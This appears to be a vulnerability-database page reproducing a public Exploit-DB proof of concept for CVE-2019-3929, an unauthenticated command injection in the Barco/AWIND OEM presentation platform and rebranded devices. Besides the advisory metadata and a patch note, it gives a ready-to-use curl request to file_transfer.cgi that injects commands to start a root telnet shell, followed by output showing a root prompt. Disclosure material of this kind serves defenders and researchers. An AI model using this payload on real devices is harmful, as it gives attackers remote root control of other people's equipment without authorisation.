Barco/AWIND OEM Presentation Platform Unauthenticated Remote Command Injection

vendor:

OEM Presentation Platform

by:

Jacob Baines

9.8

CVSS

CRITICAL

Command Injection

CWE

Product Name: OEM Presentation Platform

Affected Version From: 1.6.0.2

Affected Version To: 2.4.1.19

Patch Exists: YES

Related CWE: CVE-2019-3929

CPE: h:barco:awind_oem_presentation_platform

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Crestron AM-100, Crestron AM-101, Barco wePresent WiPG-1000P, Barco wePresent WiPG-1600W, Extron ShareLink 200/250, Teq AV IT WIPS710, InFocus LiteShow3, InFocus LiteShow4, Optoma WPS-Pro, Blackbox HD WPS, SHARP PN-L703WA

2019

Barco/AWIND OEM Presentation Platform Unauthenticated Remote Command Injection

A vulnerability in Barco/AWIND OEM Presentation Platform allows an unauthenticated attacker to execute arbitrary commands on the target device. This vulnerability is due to improper input validation of user-supplied data. An attacker can exploit this vulnerability by sending a specially crafted HTTP POST request to the vulnerable device. Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the target device.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to update their devices to the latest version.

Source

Exploit-DB raw data:

##
# Exploit Title: Barco/AWIND OEM Presentation Platform Unauthenticated Remote Command Injection 
# Date: 05/01/2019
# Exploit Author: Jacob Baines
# Tested on: Crestron AM-100 1.6.0.2
# CVE : CVE-2019-3929
# PoC Video: https://www.youtube.com/watch?v=q-PIjnPcu2k
# Advisory: https://www.tenable.com/security/research/tra-2019-20
# Writeup: https://medium.com/tenable-techblog/eight-devices-one-exploit-f5fc28c70a7c
# Affected Vendors/Device/Firmware:
#  - Crestron AM-100 1.6.0.2
#  - Crestron AM-101 2.7.0.1
#  - Barco wePresent WiPG-1000P 2.3.0.10
#  - Barco wePresent WiPG-1600W before 2.4.1.19
#  - Extron ShareLink 200/250 2.0.3.4
#  - Teq AV IT WIPS710 1.1.0.7
#  - InFocus LiteShow3 1.0.16
#  - InFocus LiteShow4 2.0.0.7
#  - Optoma WPS-Pro 1.0.0.5
#  - Blackbox HD WPS 1.0.0.5
#  - SHARP PN-L703WA 1.4.2.3
##

The following curl command executes the commands "/usr/sbin/telnetd -p 1271 -l /bin/sh" and "whoami" on the target device:

curl --header "Content-Type: application/x-www-form-urlencoded" \
--request POST \
--data "file_transfer=new&dir='Pa_Note/usr/sbin/telnetd -p 1271 -l /bin/shPa_Note'whoami" \
--insecure https://192.168.88.250/cgi-bin/file_transfer.cgi

Example:

albinolobster@ubuntu:~$ curl --header "Content-Type: application/x-www-form-urlencoded" --request POST --data "file_transfer=new&dir='Pa_Note/usr/sbin/telnetd -p 1271 -l /bin/shPa_Note'whoami" --insecure https://192.168.88.250/cgi-bin/file_transfer.cgi
root
albinolobster@ubuntu:~$ telnet 192.168.88.250 1271
Trying 192.168.88.250...
Connected to 192.168.88.250.
Escape character is '^]'.

~/boa/cgi-bin #